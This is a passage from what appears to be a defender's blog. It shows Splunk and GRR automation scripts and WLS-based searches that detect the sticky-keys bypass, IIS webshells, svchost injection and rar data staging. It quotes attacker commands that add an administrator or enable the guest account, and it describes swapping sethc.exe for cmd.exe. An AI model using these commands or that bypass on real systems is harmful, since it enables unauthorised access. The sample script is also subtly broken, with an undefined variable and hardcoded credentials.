<a href="http://2.bp.blogspot.com/-AWzqhSDi0cQ/ViHDOCppAzI/AAAAAAAAssE/nAWxjIjmcXY/s1600/rapper.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="http://2.bp.blogspot.com/-AWzqhSDi0cQ/ViHDOCppAzI/AAAAAAAAssE/nAWxjIjmcXY/s320/rapper.tiff" width="320" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">wrapper.py (Mashed together from a few examples on the Splunk forums):</span><br />
<pre style="background-image: URL(http://2.bp.blogspot.com/_z5ltvMQPaa8/SjJXr_U2YBI/AAAAAAAAAAM/46OqEP32CJ8/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> #!/usr/bin/python
import gzip, os, sys, csv
from subprocess import call
python_executable = "/usr/bin/python"
real_script = "/opt/splunk/bin/scripts/grrRemoteGetFile.py"
for envvar in ("PYTHONPATH", "LD_LIBRARY_PATH"):
if envvar in os.environ:
del os.environ[envvar]
def openany(p):
if p.endswith(".gz"):
return gzip.open(p)
else:
return open(p)
results_file = sys.argv[8]
for row in csv.DictReader(openany(results_file)):
my_command = [ python_executable, real_script, row["host"], ]
call(my_command)
</code></pre>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">The wrapper script does the following: </span><br />
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Remove environment path and LD_LIBRARY_PATH</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Opens the splunk search results (unzip's and reads csv for host value) .</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Execute 'grrRemoteGetFile.py' with the systems default python along with the hostname that triggered the alert.</span></li>
</ul>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Splunk will pass 9 variables to the script when it executes. Variable 8 contains the path to the gzip'd search results in csv format. </span><span style="font-family: Arial, Helvetica, sans-serif;">The other variables are documented <a href="http://docs.splunk.com/Documentation/Splunk/6.0/Alert/Configuringscriptedalerts" target="_blank">here</a>.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">grrRemoteGetFile.py </span><br />
<pre style="background-image: URL(http://2.bp.blogspot.com/_z5ltvMQPaa8/SjJXr_U2YBI/AAAAAAAAAAM/46OqEP32CJ8/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> #!/usr/bin/python
import sys, json, urllib2, base64, requests
from requests.auth import HTTPBasicAuth
hostname = sys.argv[2]
grrserver = 'https://grrserver:8000'
username = 'Tupac'
password = 'isAlive'
base64string = base64.encodestring('%s:%s' % (username, password)).replace('\n', '')
authheader = "Basic %s" % base64string
index_response = requests.get(grrserver, auth=HTTPBasicAuth(username, password))
csrf_token = index_response.cookies.get("csrftoken")
headers = {
"Authorization": authheader,
"x-csrftoken": csrf_token,
"x-requested-with": "XMLHttpRequest"
}
data = {
"hostname": hostname,
"paths": ["%%users.appdata%%\Roaming\*\*.{js,exe}",
"%%users.appdata%%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.lnk"],
"pathtype": "OS"
}
response = requests.post(grrserver + "/api/clients/" + hostname + "/flows/remotegetfile",
headers=headers, data=json.dumps(data),
cookies=cookies, auth=HTTPBasicAuth(username, password))
</code></pre>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">'grrRemoteGetFile.py' will start a FileFinder flow on the 'hostname' variable passed to it by the 'wrapper.py' script. </span><span style="font-family: Arial, Helvetica, sans-serif;">When IR staff is able to review the ticket, the files will be available in GRR to download and review.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>In Summary...</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">This is just a basic example to demonstrate how all the pieces fit together. There are some really</span><span style="font-family: Arial, Helvetica, sans-serif;"> cool things you can do with these tools to automate stuff. Some things I've been playing with:</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Automatically launch Incident Response Collector ($MFT, Registry, Browser History, etc.) and full memory image when a known bad MD5 or static indicator is seen in Splunk.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Utilize WLS's hash tracking to automatically submit new binaries to internal malware analysis tools. Splunk alert would be:</span><br />
<blockquote class="tr_bq">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">`wlslogs` (EventID=4688 OR EventID=592) NewHash=True</span></blockquote>
<span style="font-family: Arial, Helvetica, sans-serif;">In the wrapper.py, you would add row["NewProcessName"] and pass it to grrRemoteGetFile.py to download (instead of the static path in the example above).</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Get any executable downloaded from the internet and send it to internal malware analysis tools.</span><br />
<blockquote class="tr_bq">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: x-small;">`wlslogs` (EventID=4688 OR EventID=592) Zone=3</span></span></blockquote>
<span style="font-family: Arial, Helvetica, sans-serif;">Get any compressed file attachment opened from Outlook email and send to internal malware analysis tools.</span><br />
<blockquote class="tr_bq">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">`wlslogs` (EventID=4688 OR EventID=592) CreatorProcessName=OUTLOOK BaseFileName=winzip*</span></blockquote>
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">If you have any examples/suggestions on automation with GRR and WLS/Splunk, share them on the <a href="https://groups.google.com/forum/#!forum/grr-users" target="_blank">GRR user group</a>, I'm really interested to hear what other folks have done.</span><br />
<div>
<br /></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-2139855789243746740.post-42703841984817365852015-08-23T15:36:00.000-07:002015-08-23T15:36:29.194-07:00DFIR with Windows Logging Service (WLS)<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 14.6666666666667px; line-height: 1.38; white-space: pre-wrap;">WLS is logging service built with forensics and incident response in mind. The best way to explain what WLS is to show an example:</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Here is what you get from a process creation event from Windows:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">2014 Nov 21 21:39:28</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">10.10.10.10</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">WINTETST.domain.com</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">MSWinEventLog</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">0</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Security</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">2099</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">nov 21 16:39:28 2014</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">4688</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Microsoft-Windows-Security-Auditing</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">domain\WINTETST$</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">N/A</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Success Audit</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">WINTETST.domain.com</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Process Creation</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">A new process has been created. Subject: Security ID: S-1-5-18 Account Name: WINTETST$ Account Domain: DOMAIN Logon ID: 0x3e7 Process Information: New Process ID: 0xf0c New Process Name: C:\Windows\System32\dllhost.exe Token Elevation Type: TokenElevationTypeLimited (3) Creator Process ID: 0x2d4 Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. </span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Here is what WLS logs:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Aug 23 12:57:57 win-1ujak6s06vk. Security: LogType="WLS", BaseFileName="notepad.exe", Channel="Security", CommandLine="'C:\Windows\system32\notepad.exe'", CompanyName="Microsoft Corporation", Computer="WIN-1UJAK6S06VK", CreatorProcessName="explorer", Entropy="6.95893575618574", EventID="4688", EventRecordID="72208", ExecutionProcessID="4", ExecutionThreadID="56", FileDescription="Notepad", FileVersion="6.1.7600.16385 (win7_rtm.090713-1255)", InternalName="Notepad", Keywords="0x8020000000000000", Language="English (United States)", Length="193536", Level="0", MD5="F2C7BB8ACC97F92E987A2D4087D021B1", NewProcessId="0x8a8", NewProcessName="C:\Windows\System32\notepad.exe", Opcode="0",ProcessId="0x8ec",ProductVersion="6.1.7600.16385",ProviderGuid="{54849625-5478-4994-A5BA-3E3B0328C30D}", ProviderName="Microsoft-Windows-Security-Auditing", SessionId="2",SESSIONNAME="Console",SHA1="7EB0139D2175739B3CCB0D1110067820BE6ABD29",Signed="Catalog",SSDeep="3072:QOrerAgXWMI6vKoTN6p0frxJLgf7nDVF6PUp1Yo3ICgx:QWDcRgNpex5gfzDVlVXg",SubjectDomainName="WIN-1UJAK6S06VK",SubjectLogonId="0x1fc0a2",SubjectUserName="testuser",SubjectUserSid="S-1-5-21-874994001-2474262622-3605836291-1008", Task="13312", TokenElevationType="TokenElevationTypeDefault (1)",ValidSignatureDate="False", Version="1", WindowStation="Winsta0\Default", Zone="0"</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">All the useless information is replaced with useful information. More details on WLS can be found here </span><a href="http://digirati82.com/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://digirati82.com/</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. I’m writing this blogpost to share some methods for detecting malicious behavior and malware using WLS and Splunk. </span></div>
<b style="font-weight: normal;"><br /><br /></b><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Sticky Keys Authentication Bypass</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Using sticky keys to bypass authentication is a favorite since it doesn’t involve malicious binaries. This method relies on replacing sethc.exe, utilman.exe, osk.exe, magnify.exe or narrator.exe with cmd.exe in the windows\system32\ directory. Since we are capturing the file metadata on execution, detecting this malicious behavior is simple. Create a schedule Splunk job to email you when event count is >0 for this search:</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">index=main (EventID=4688 OR EventID=592) FileDescription="Windows Command Processor" BaseFileName!=cmd.exe</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">A legitimate execution of the command prompt will contain the file description of “Windows Command Processor" with the BaseFileName of “cmd.exe”</span></div>
<b style="font-weight: normal;"><br /></b><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Webshell / Compromised Web Server Detection</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In some web server compromises attackers will add a webshell allowing them command line access for lateral movement among other things. Since we know that the IIS service account shouldn’t normally be running ‘cmd.exe’ or commands like whoami, netstat, “net localgroup administrators pwnu /add” or even “net user guest /active:yes” we can create a splunk alert to notify us when this behavior does occur.</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Here is an example WLS event snippet of a compromised IIS webserver executing the command prompt through a webshell:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BaseFileName="cmd.exe", Channel="Security", CompanyName="Microsoft Corporation", Computer="WIN-1UJAK6S06VK", CreatorProcessName="w3wp", EventID="4688", SubjectUserSid="S-1-5-82-3006700770-424185619-1745488364-794895919-40</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">04696415", NewProcessName="C:\Windows\System32\cmd.exe", SubjectUserName="Defaul</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">tAppPool"</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">An example Splunk search to alert on this activity:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">index=main (EventID=4688 OR EventID=592) CreatorProcessName=”w3wp”</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">NewProcessName="C:\Windows\System32\cmd.exe"</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Maybe it’s a good idea to see ALL command line activity by the IIS user:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">index=main WLS_CommandMonitor User=”IIS APPPOOL\\DefaultAppPool"</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In any case we know what an IIS server shouldn’t do, creating alerts on known bad behavior is a simple way to increase your odds of finding a compromised server.</span></div>
<b style="font-weight: normal;"><br /></b><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Svchost.exe Injection</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Some malware will start a legitimate copy of svchost.exe and inject code into it. This method used to hide on a system is easy to alert on. Since services.exe should execute svchost we can create a Splunk alert anytime svchost.exe is executed when the Creator Process Name is not services.exe. Here is a snippet of what a malicious execution would look like:</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BaseFileName="svchost.exe", Channel="Security", CommandLine="'c:\Windows\System32\svchost.exe", CompanyName="Microsoft Corporation", Computer="WIN-1UJAK6S06VK", CreatorProcessName="mspswls.tmp", EventID="4688", </span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Our Splunk search to alert on this behavior would look like this: </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">index=main (EventID=4688 OR EventID=592) BaseFileName=svchost.exe CreatorProcessName!=”services.exe”</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Alerting on Attacker Behavior</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Some attackers follow a pattern after gaining access; gather system information, escalate privileges, lateral movement, persistence, collect & exfil data. Their tools are constantly changing to evade detection but their behaviors and the tools behaviors don’t evolve so quickly. A great example is the staging of data for exfil. Attackers will sometime use a custom version of rar to password protect a file, in several version found on Virustotal they all use the standard command flags of ‘a -ph’ to create an archive and to password protect the data. </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SomeExecutable.exe </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">a -hp</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SomePassword RandomFlename RandomFilePath </span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Based on this we can add a scheduled search in Splunk for the following:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">index=main WLS_CommandMonitor Command=”*a -hp*”</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Example WLS CommandMonitor Log</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Aug 23 13:39:09 win-1ujak6s06vk. WLS_CommandMonitor: LogType="WLS", </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
